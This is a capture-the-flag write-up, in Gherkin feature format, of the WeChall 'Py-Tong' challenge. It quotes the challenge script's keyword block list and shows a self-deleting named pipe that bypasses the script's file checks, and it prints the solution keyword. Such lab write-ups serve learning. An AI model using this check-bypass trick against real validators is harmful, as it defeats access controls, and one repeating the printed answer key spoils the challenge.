# language: en

Feature: Solve Py-Tong challenge
  From the WeChall site
  Of the category Exploit, Python and Warchall
  As the registered user disassembly

  Background:
    Given a script writen in Python
    And access to the Warchall server via SSH
    Given I am running macOS High Sierra 10.13.4 with Homebrew 0.9.9
    And I am using OpenSSH_7.6p1

  Scenario: Check the script's behavior
    Given there's two ways in which the challenge can be solve
    But both share the same first step
    """
    11  # We want to prevent some noobish solutions
    12  if any(ipattern in filepath for ipattern in
               ('proc', 'uptime', 'tmp', 'random', 'full', 'zero', 'null')):
    13    raise ValueError('nononono: hacking is not allowed')
    15  # You have to give me an valid file!
    16  if not os.path.exists(filepath):
    17    raise ValueError('sorry file "%s" does not exists' % filepath)
    18  # We are opening the file here and store the content in 'jjk'
    19  print('opening %s' % filepath)
    20  with open(filepath) as gizmore:
    21    jjk = gizmore.read()
    22  print('closed')
    """
    And one way is to 'remove' the file after it has been read
    """
    25  # The file was closed, does it still exists?
    26  if not os.path.exists(filepath):
    27    # The file does not exists anymore, you have found a solution
    28    print('You are l33t')
    29    return True
    """
    And the other one is to change the file contents
    """
    30  else:
    31  # Ok, we will reopen the file and store its content in 'kwisatz'
    32  with open(filepath) as spaceone:
    33   kwisatz = spaceone.read()
    35  # Does the content differs from old content?
    36  if jjk != kwisatz:
    37    # content differs so return True
    38    print('You are a winner')
    39    return True
    """
    Then I look for ways to auto-delete a file or store outputs like a log file

  Scenario: Learn about named pipes (FIFO)
    Given I try to solve the challenge storing the output (prints) in real time
    But found a type of special file called FIFO that can store commands
    And start trying differents methods to write more commands in the same file
    But came up with the idea that I can remove the FIFO

  Scenario: Make an auto-removing file
    Given I access the Warchall server with my credentials
    And I create a FIFO that can run in background (&) and remove itself
    """
    $ mkfifo ~/myfifo
    $ rm myfifo > ~/myfifo &
    """
    When I go to the directory that have the Python script and pass the FIFO
    """
    $ cd /home/level/12/
    $ ./pytong ~/myfifo
    """
    Then shows me the following output:
    """
    opening /home/user/disassembly/myfifo
    closed
    You are l33t
    Yep! your Solution is 'KnowYourFilesChiller'.
    """
    Then I can finally solve the challenge with the above keyword
